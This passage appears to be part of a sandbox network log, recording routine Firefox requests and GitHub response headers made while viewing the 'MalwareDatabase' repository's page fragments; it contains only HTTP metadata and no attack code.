                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:28:07 GMT
                          content-type: text/html; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"f8ce74fa11af024d976d76c8d883b0e6"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          x-html-safe: 33e84c7bdcf00760a1e8e79a298b669303c5a66565534ab525c26b9ca425589f
                          x-github-request-id: C511:1D672B:184AB1:1C6248:6797C212
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/latest-commit/master
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/latest-commit/master HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: application/json
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/tree/master
                          content-type: application/json
                          github-verified-fetch: true
                          x-requested-with: XMLHttpRequest
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 304
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:28:08 GMT
                          content-type: application/json; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"57dd3ff551f8b3d10b3856a048bab63c"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          x-github-request-id: C511:1D672B:184B24:1C62D9:6797C228
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/tree-commit-info/master
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/tree-commit-info/master HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: application/json
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/tree/master
                          content-type: application/json
                          github-verified-fetch: true
                          x-requested-with: XMLHttpRequest
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          if-none-match: W/"6ca9b2649cfe1e58c896333ecef2b349"
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:28:08 GMT
                          content-type: application/json; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"2879663a9926b481c91f72f932d501eb"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          content-length: 439
                          x-github-request-id: C511:1D672B:184B21:1C62D4:6797C227
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/branch-and-tag-count
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/branch-and-tag-count HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: application/json
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/tree/master
                          content-type: application/json
                          github-verified-fetch: true
                          x-requested-with: XMLHttpRequest
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          if-none-match: W/"57dd3ff551f8b3d10b3856a048bab63c"
                          te: trailers
                          Response
                          HTTP/2.0 204
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:28:08 GMT
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          cache-control: no-cache
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          x-github-request-id: C511:1D672B:184B28:1C62E4:6797C228
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/hovercards/citation/sidebar_partial?tree_name=master
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/hovercards/citation/sidebar_partial?tree_name=master HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: text/html
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/tree/master
                          x-requested-with: XMLHttpRequest
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 304
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:28:08 GMT
                          content-type: text/html; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"da2fb7fc841243aeeb0f0b5e00622b6a"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          x-html-safe: 33e84c7bdcf00760a1e8e79a298b669303c5a66565534ab525c26b9ca425589f
                          x-github-request-id: C511:1D672B:184B2A:1C62E6:6797C228
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/used_by_list
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/used_by_list HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: text/fragment+html
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/tree/master
                          x-requested-with: XMLHttpRequest
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:28:08 GMT
                          content-type: text/plain; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          cache-control: no-cache
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          content-length: 20
                          x-github-request-id: C511:1D672B:184B2A:1C62E5:6797C228
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/contributors_list?count=5&current_repository=MalwareDatabase&items_to_show=5
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/contributors_list?count=5&current_repository=MalwareDatabase&items_to_show=5 HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: text/html
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/tree/master
                          x-requested-with: XMLHttpRequest
